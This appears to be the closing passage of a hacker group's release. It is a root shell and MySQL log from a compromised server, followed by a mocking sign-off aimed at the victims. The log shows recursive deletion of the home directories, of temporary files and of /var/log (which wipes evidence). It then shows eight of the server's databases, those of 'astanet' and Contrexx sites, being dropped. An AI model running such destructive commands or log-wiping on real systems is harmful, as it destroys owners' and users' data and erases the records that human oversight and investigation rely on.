sh-3.2# rm -rf tmp/
sh-3.2# cd ~
sh-3.2# rm -rf *
sh-3.2# rm -rf /var/log/
rm: cannot remove directory `/var/log//proftpd': Directory not empty
sh-3.2# rm -rf /home/*
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 407156
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database              |
+-----------------------+
| information_schema    |
| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
| astanet_membersystem  |
| com_contrexx          |
| com_contrexx2         |
| com_contrexx2_live    |
| da_roundcube          |
| dolphin               |
| ideapool              |
| mysql                 |
| test                  |
| yourmaster            |
+-----------------------+
14 rows in set (0.03 sec)

mysql> drop database astanet_membersystem;
droQuery OK, 46 rows affected (0.81 sec)

mysql> drop database com_contrexx2;
Query OK, 237 rows affected (2.23 sec)

mysql> drop database com_contrexx2_live;
Query OK, 227 rows affected (7.63 sec)

mysql> drop database ideapool;
Query OK, 69 rows affected (0.19 sec)

mysql> drop database yourmaster;
Query OK, 158 rows affected (0.55 sec)

mysql> drop database astanet_ads;
Query OK, 9 rows affected (0.11 sec)

mysql> drop database astanet_mailing_lists;
Query OK, 24 rows affected (1.47 sec)

mysql> drop database astanet_mediawiki;
Query OK, 31 rows affected (0.51 sec)

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| da_roundcube       |
| dolphin            |
| mysql              |
| test               |
+--------------------+
5 rows in set (0.00 sec)

What a journey! We're not sure exactly why the "Terminator" had any influence on
their naming (conventions) but we're sure Arnold himself wouldn't be in the
wrong to say this pack of morons *won't be back*.